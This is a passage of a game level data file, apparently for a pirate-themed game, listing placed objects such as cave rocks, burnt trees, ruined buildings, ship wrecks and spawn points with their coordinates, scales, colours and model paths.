'models/props/pir_m_prp_cav_rockGroup_g'}},'1273098431.81akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(92.791, 0.0, 0.0),'Pos': Point3(461.181, -388.523, 164.922),'RenderEffect': False,'Scale': VBase3(1.783, 1.783, 1.783),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273098505.0akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(8.885, 11.695, 22.963),'Pos': Point3(613.174, 167.386, 198.856),'RenderEffect': False,'Scale': VBase3(0.945, 0.945, 0.945),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273098649.62akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-26.12, 3.652, 10.575),'Pos': Point3(503.825, 431.405, 181.5),'RenderEffect': False,'Scale': VBase3(1.482, 1.482, 1.482),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273098753.55akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-69.292, -15.161, 0.0),'Pos': Point3(481.867, -169.883, 173.434),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273098833.67akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(158.628, 0.0, 0.0),'Pos': Point3(703.688, -316.505, -1.45),'RenderEffect': False,'Scale': VBase3(1.576, 1.576, 1.576),'VisSize': '','Visual': {'Color': (0.526, 0.654, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273098914.44akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.245, -1.931, 7.23),'Pos': Point3(277.582, 68.431, -4.215),'RenderEffect': False,'Scale': VBase3(2.635, 2.635, 2.635),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273099012.62akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-4.218, -9.873, 9.596),'Pos': Point3(195.376, -65.076, 41.22),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273099299.83akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-136.734, -12.445, 0.0),'Pos': Point3(47.576, -87.691, 81.878),'RenderEffect': False,'Scale': VBase3(1.502, 1.502, 1.502),'VisSize': '','Visual': {'Color': (0.38, 0.399, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273099391.45akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(107.43, 0.0, 0.0),'Pos': Point3(-40.778, -116.336, 89.904),'RenderEffect': False,'Scale': VBase3(2.053, 2.053, 2.053),'VisSize': '','Visual': {'Color': (0.416, 0.469, 0.548, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1273099499.47akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(67.716, 0.0, 3.126),'Pos': Point3(-348.91, -196.611, 106.082),'RenderEffect': False,'Scale': VBase3(7.809, 7.809, 9.016),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273170865.64akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273170865.64akelts0','Holiday': '','Hpr': VBase3(-73.141, -0.262, 10.777),'Pos': Point3(-30.34, -48.556, 94.382),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_gate','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273170904.98akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273170904.98akelts0','Holiday': '','Hpr': VBase3(93.721, 5.187, 0.0),'Pos': Point3(-51.398, -40.174, 97.075),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_half_house','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273171053.22akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273171053.22akelts0','Holiday': '','Hpr': VBase3(-133.758, -21.36, 0.0),'Pos': Point3(-49.897, -57.986, 96.218),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273171125.73akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273171125.73akelts0','Holiday': '','Hpr': VBase3(-112.315, 1.107, -3.738),'Pos': Point3(-524.407, 109.947, 71.589),'Scale': VBase3(0.838, 0.838, 0.838),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_house','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273171584.94akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-313.245, -201.343, 111.34),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273171595.62akelts': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(2.715, -1.495, -1.355),'Pos': Point3(264.379, 604.245, 24.025),'Scale': VBase3(0.843, 0.843, 0.843),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/pir_m_prp_grp_barrelsE_burned'}},'1273171752.0akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(118.721, 0.0, 13.816),'Pos': Point3(-473.916, 320.719, 49.888),'RenderEffect': False,'Scale': VBase3(1.722, 1.722, 1.722),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273179202.86akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(-82.219, 0.0, 0.0),'Pos': Point3(577.128, -289.54, -4.037),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_carrack'}},'1273179694.97akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(159.68, 0.0, 0.0),'Pos': Point3(-1008.039, 342.592, -16.164),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_mastC'}},'1273179724.13akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(38.417, 0.0, 0.0),'Pos': Point3(-518.997, 1011.182, -17.704),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_mastA'}},'1273179750.3akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(-7.187, 0.0, 0.0),'Pos': Point3(426.648, 1156.301, -5.358),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_mastB'}},'1273180067.83akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-66.318, 0.998, -4.407),'Objects': {'1273620729.81akelts': {'Type': 'Volcano','DisableCollision': False,'GridPos': Point3(-152.423, 52.758, 84.76),'Holiday': '','Hpr': VBase3(66.271, 3.635, 2.686),'Pos': Point3(-2.777, 3.665, 0.245),'Scale': VBase3(0.498, 0.498, 0.498),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}}},'Pos': Point3(-164.596, 30.851, 84.243),'RenderEffect': False,'Scale': VBase3(5.444, 5.444, 5.444),'VisSize': '','Visual': {'Color': (0.375, 0.422, 0.493, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273180242.13akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(104.142, -1.92, 5.189),'Pos': Point3(390.668, -76.892, 12.204),'RenderEffect': False,'Scale': VBase3(2.826, 2.826, 2.826),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273180302.47akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-30.435, -19.103, 0.147),'Pos': Point3(280.498, -23.357, 1.174),'RenderEffect': False,'Scale': VBase3(2.495, 2.495, 2.495),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_h'}},'1273180471.44akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(41.058, 0.0, 0.0),'Pos': Point3(359.486, 878.795, -0.184),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.85, 1.0, 0.9, 1.0),'Model': 'models/props/pir_m_shp_wrk_galleon'}},'1273180567.09akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-171.453, -12.164, 10.912),'Pos': Point3(685.158, 222.579, 204.875),'RenderEffect': False,'Scale': VBase3(1.645, 1.645, 1.645),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273180750.5akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(74.945, 0.0, 0.0),'Pos': Point3(514.333, 295.995, 160.385),'RenderEffect': False,'Scale': VBase3(3.011, 3.011, 3.011),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273180847.2akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(469.798, 414.593, 259.328),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_stite_med'}},'1273180893.11akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(535.348, 506.286, 175.733),'RenderEffect': False,'Scale': VBase3(0.67, 0.67, 0.67),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_column_large'}},'1273180952.45akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(145.701, 0.0, 0.0),'Pos': Point3(591.849, 453.019, 169.878),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.411, 0.463, 0.541, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273180978.08akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(125.337, 0.0, 0.0),'Pos': Point3(511.265, 211.404, 155.191),'RenderEffect': False,'Scale': VBase3(1.391, 1.391, 1.391),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroupIron_f'}},'1273181103.83akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-178.252, 28.302, 179.306),'Pos': Point3(488.843, 497.85, 241.915),'RenderEffect': False,'Scale': VBase3(4.259, 4.259, 4.259),'VisSize': '','Visual': {'Color': (0.391, 0.44, 0.514, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273181198.34akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(129.976, 0.0, 0.0),'Pos': Point3(586.724, 531.356, 171.906),'RenderEffect': False,'Scale': VBase3(0.577, 0.577, 0.577),'VisSize': '','Visual': {'Color': (0.468, 0.527, 0.616, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroupIron_a'}},'1273181245.44akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(110.545, 0.0, 0.0),'Pos': Point3(471.26, 260.86, 161.551),'RenderEffect': False,'Scale': VBase3(0.577, 0.577, 0.577),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroupIron_b'}},'1273181306.47akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-49.828, 13.398, -93.118),'Pos': Point3(540.56, 252.089, 196.704),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.300000011921, 0.300000011921, 0.300000011921, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1273181408.98akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-155.312, 22.737, 0.0),'Pos': Point3(274.569, 544.511, 209.855),'RenderEffect': False,'Scale': VBase3(2.031, 2.031, 2.031),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273181477.33akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-106.761, 8.007, -1.341),'Pos': Point3(-347.621, 378.845, 43.932),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273181519.3akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(116.422, 0.0, 0.0),'Pos': Point3(312.509, 668.811, 11.085),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273181555.27akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-61.123, 0.0, -87.341),'Pos': Point3(253.143, 553.582, 128.975),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273181669.42akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(162.684, -4.417, 23.96),'Pos': Point3(-210.003, 471.1, 48.247),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273271715.34akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273271715.34akelts0','GridPos': Point3(-635.985, 181.68, 39.626),'Holiday': '','Hpr': VBase3(-17.484, 0.0, 0.0),'Objects': {'1273271715.37akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.816, -10.08, -0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-593.437, 197.627, 66.453),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_spn_houseK_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273272701.96akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(105.744, 0.0, 0.0),'Pos': Point3(-432.408, -26.632, 71.14),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273272741.85akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(140.626, 0.0, 0.0),'Pos': Point3(-510.307, 67.175, 69.725),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273272849.65akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(136.302, 0.0, 0.0),'Pos': Point3(-492.289, 30.705, 71.479),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273509425.92akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-158.868, 0.0, 0.0),'Pos': Point3(-538.328, 209.621, 65.317),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273509449.95akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-169.549, 0.0, 0.0),'Pos': Point3(-252.845, 397.968, 45.508),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273509490.64akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-147.763, 0.0, 0.0),'Pos': Point3(-620.87, 210.625, 64.91),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273509537.2akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-50.753, 0.0, 0.0),'Pos': Point3(-580.458, 92.751, 71.706),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273509626.86akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(53.942, -14.145, 15.526),'Pos': Point3(-604.474, 261.311, 61.452),'RenderEffect': False,'Scale': VBase3(1.308, 1.308, 1.308),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273509669.45akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-10.375, -1.124, -3.369),'Pos': Point3(-503.393, 235.76, 66.517),'RenderEffect': False,'Scale': VBase3(1.308, 1.308, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273509745.23akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-539.012, 254.793, 65.526),'RenderEffect': False,'Scale': VBase3(0.321, 0.321, 0.321),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_cav_column_large'}},'1273509836.28akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-12.173, -0.33, -178.469),'Pos': Point3(-571.3, 305.584, 102.017),'RenderEffect': False,'Scale': VBase3(4.427, 4.427, 4.427),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273510014.34akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(22.644, 0.0, 0.0),'Pos': Point3(-443.315, 228.732, 64.008),'RenderEffect': False,'Scale': VBase3(0.844, 0.844, 0.844),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273510138.33akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(230.387, 6.56, 48.587),'Pos': Point3(-500.062, 275.009, 84.439),'RenderEffect': False,'Scale': VBase3(0.6, 0.6, 0.6),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273510275.8akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, -15.306, 0.0),'Pos': Point3(-545.445, 307.281, 49.766),'RenderEffect': False,'Scale': VBase3(1.297, 1.297, 1.297),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273510409.94akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273510409.94akelts0','Holiday': '','Hpr': VBase3(-99.705, 7.418, -2.67),'Pos': Point3(-257.981, 463.691, 43.946),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.40000000596, 0.40000000596, 0.40000000596, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/shanty_leanto_B','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273510458.75akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273510458.75akelts0','Holiday': '','Hpr': VBase3(57.711, -1.184, 5.748),'Pos': Point3(-309.58, 447.803, 42.05),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_gate','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273510582.34akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-163.007, -1.321, -1.919),'Pos': Point3(139.559, 593.442, 13.643),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273510832.52akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-146.69, -1.814, -2.791),'Pos': Point3(-243.779, 696.96, -5.298),'RenderEffect': False,'Scale': VBase3(1.336, 1.336, 1.336),'VisSize': '','Visual': {'Color': (0.541, 0.717, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273510871.31akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(34.846, 1.888, 2.741),'Pos': Point3(-308.15, 637.321, -3.425),'RenderEffect': False,'Scale': VBase3(1.336, 1.336, 1.336),'VisSize': '','Visual': {'Color': (0.541, 0.717, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273510959.8akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(10.788, -7.205, -6.657),'Pos': Point3(42.837, 836.863, 0.0),'RenderEffect': False,'Scale': VBase3(2.056, 2.974, 2.056),'VisSize': '','Visual': {'Color': (0.498, 0.712, 0.661, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273511060.0akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(95.336, 0.0, 0.0),'Index': -1,'Pos': Point3(387.886, -90.35, 14.807),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511068.05akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(174.323, 0.0, 0.0),'Index': -1,'Pos': Point3(366.891, 50.43, 0.536),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511082.69akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(138.302, 0.0, 0.0),'Index': -1,'Pos': Point3(322.793, -53.481, 14.349),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511091.59akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(128.533, 0.0, 0.0),'Index': -1,'Pos': Point3(370.997, -60.643, 13.381),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511149.67akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-142.343, -1.644, 3.422),'Pos': Point3(-141.011, -244.179, 107.426),'RenderEffect': False,'Scale': VBase3(2.721, 2.721, 3.141),'VisSize': '','Visual': {'Color': (0.416, 0.469, 0.548, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273511175.94akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-197.3, -170.54, 108.54),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511189.3akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-292.481, -119.623, 107.72),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511201.41akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-489.6, 96.598, 72.291),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511206.09akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-405.54, 222.923, 64.126),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511211.73akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-566.361, 183.918, 68.078),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511217.41akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-412.268, 78.869, 69.823),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511251.84akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-388.058, 42.587, 70.898),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511296.48akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-271.959, -262.049, 117.347),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511387.89akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-106.926, -97.084, 103.938),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511391.06akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-77.59, -168.754, 105.038),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511394.03akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-188.117, -100.273, 106.406),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 